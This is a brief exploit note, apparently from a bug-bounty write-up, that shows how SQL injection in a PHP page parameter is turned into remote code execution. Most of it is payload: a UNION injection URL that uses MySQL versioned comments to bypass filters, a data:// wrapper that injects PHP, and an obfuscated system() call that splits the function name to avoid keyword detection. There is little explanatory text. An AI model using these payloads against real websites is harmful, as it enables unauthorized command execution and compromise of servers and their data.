SQL Injection (SQLi) to Remote Code Execution (RCE)

Example:
https://customer.com/php/load.php?page=' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php echo system(“uname -a”);?>’-- -

<?php
$a=”sy”;
$b=”stem”;
$c=$a.$b;
$c(“uname -a”);
?>

Finally Payload: 
https://customer.com/php/load.php?page=' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -

Screenshoot:
https://miro.medium.com/max/673/1*CdiFlkRAOVxoHz2qzjavUA.png

Greetz to: Efren Diaz (https://medium.com/@elefr3n)
